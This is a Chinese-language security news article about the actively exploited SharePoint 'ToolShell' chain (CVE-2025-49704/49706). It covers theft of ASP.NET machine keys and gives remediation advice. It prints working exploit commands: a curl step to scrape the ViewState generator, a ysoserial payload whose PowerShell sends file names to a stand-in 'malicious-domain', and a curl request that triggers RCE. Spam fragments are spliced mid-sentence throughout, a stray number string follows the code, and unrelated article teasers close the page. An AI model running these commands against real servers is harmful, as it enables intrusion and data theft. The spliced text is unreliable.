工具链漏洞预警:全球活跃利用中的SharePoint新型零日RCE攻击链
我要评论
图片来源:CODE WHITE GmbH
2025年7月18日晚间,工具攻击Eye Security安全团队发现一起大规模利用新型Microsoft SharePoint远程代码执行(RCE)漏洞链的链漏链攻击活动,该漏洞链被命名为ToolShell。洞预的攻击者通过组合利用CVE-2025-49704和CVE-2025-49706两个漏洞,警全可在无需认证的球活情况下完全控制本地部署的SharePoint服务器。
"这并非凭证泄露问题,跃利用中而是新型零已被武器化的Pwn2Own漏洞利用代码在野利用",Eye Security特别强调。工具攻击
漏洞技术细节ToolShell攻击链包含两个关键漏洞:
CVE-2025-49706(CVSS 6.3):SharePoint服务器欺骗漏洞CVE-2025-49704(CVSS 8.8):通过ToolPane端点触发的链漏链SharePoint RCE漏洞初步分析认为攻击需要有效凭证,但深入调查显示实际无需任何认证。洞预的报告指出:"对/_layouts/15/ToolPane.aspx的警全POST请求特征非常明显...我们确信攻击全程未使用任何凭证"。
攻击手法分析攻击基于Code White GmbH曾在Pwn2Own上演示的球活概念验证代码,免费源码下载现已被完全武器化。跃利用中成功利用后,新型零攻击者可直接植入隐蔽的工具攻击ASPX恶意负载而无需登录。已观测到的恶意文件spinstall0.aspx疑似基于Sharpyshell开发,其设计目的并非直接执行命令,而是窃取加密机器密钥。
"这不是典型的网页后门...该页面通过调用.NET内部方法读取SharePoint服务器的MachineKey配置",研究人员解释。这些密钥(如ValidationKey和DecryptionKey)用于生成有效的__VIEWSTATE令牌——这是ASP.NET的核心安全机制。获取密钥后,攻击者可使用ysoserial等工具签署恶意负载实现完全远程代码执行。b2b供应网
复制# 通过任意公开SharePoint页面获取<VIEWSTATE_GENERATOR> curl -s https://target/_layouts/15/start.aspx | grep -oP __VIEWSTATEGENERATOR" value="\K[^"]+ # 生成viewstate攻击负载示例 ysoserial.exe -p ViewState -g TypeConfuseDelegate \ -c "powershell -nop -c \"dir C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\TEMPLATE\LAYOUTS | % { Invoke-WebRequest -Uri (http://malicious-domain/?f= + [uri]::EscapeDataString($_.Name)) }\"" \ --generator="<VIEWSTATE_GENERATOR>" \ --validationkey="<VALIDATION_KEY>" \ --validationalg="<VALIDATION_ALG>" \ --islegacy \ --minify # 将生成的令牌附加至请求即可执行命令(RCE) curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>1.2.3.4.5.6.7.8.9.10.11.12.13.14."这些负载可嵌入任意恶意命令,并被服务器视为可信输入,最终在无需凭证的情况下完成RCE攻击链",报告补充道。
影响范围与响应措施Eye Security扫描了8,000余台暴露在公网的SharePoint服务器,发现数十台已遭入侵。通过分析160字节的独特响应特征和spinstall0.aspx端点可识别受影响系统。
截至7月19日,Palo Alto Networks Unit 42确认攻击仍在持续,观测到攻击者:
通过PowerShell投放恶意ASPX负载窃取机器密钥建立持久化访问从可疑IP(如96[.]9[.]125[.]147)执行攻击模块微软已发布紧急补丁和安全指南,建议本地部署SharePoint的用户立即采取以下措施:
安装7月补丁星期二发布的最新SharePoint更新扫描入侵痕迹,重点检查/ToolPane.aspx和/spinstall0.aspx路径检查加密密钥是否泄露,如已失窃需立即重新生成监控HTTP(S)外联连接和反向Shell活动相关文章
以赛睿ApexM400键盘的性能如何?(一款适合游戏玩家的高性能机械键盘)
摘要:随着电子竞技的兴起,键盘作为游戏玩家最常用的工具之一,其性能对于游戏体验起着至关重要的作用。本文将对以赛睿ApexM400键盘的性能进行详细介绍,帮助读者了解这款机械键盘的优点和特...2025-11-04
5G可以帮助实现模块化工厂的理想,在模块化工厂中,机器可以快速重新配置,以优化生产。对于制造商来说,5G提供了改善运营性能和增强流程弹性的绝佳机会。许多新的服务和机会将来自于其无处不在的连通性。这句话2025-11-04
一、物联网通信概述 物联网最为明显的特征是网络智慧化,通过信息化的手段实现物物相连,提高不同行业的自动化管理水平,减少人为干预,从而极大程度地提升效率,同时降低人工带来的不稳定性。因此,2025-11-04
《2022 年全球边缘计算市场报告》的最新统计数据预测,边缘计算市场将出现巨大增长,预计到 2030 年其规模将达到 1559 亿美元,在预测期内复合年增长率约为 38.9%。全球物联网设备的采用也相2025-11-04电脑玩原神遇到的问题及解决方法(探索神奇世界,解决游戏中常见错误)
摘要:原神是一款备受欢迎的开放世界角色扮演游戏,然而,许多玩家在使用电脑玩原神时常常遇到各种问题和错误,这不仅影响了游戏体验,还导致了许多不必要的困扰。本文将针对电脑玩原神常见的错误进行...2025-11-04
背景公司环境有台机器硬盘故障,需要安装megacli工具进系统查看raid信息,在ubuntu20.04安装megacli解决依赖过程中失误将高版本的libtinfo包装系统上了,导致系统报glibc2025-11-04
最新评论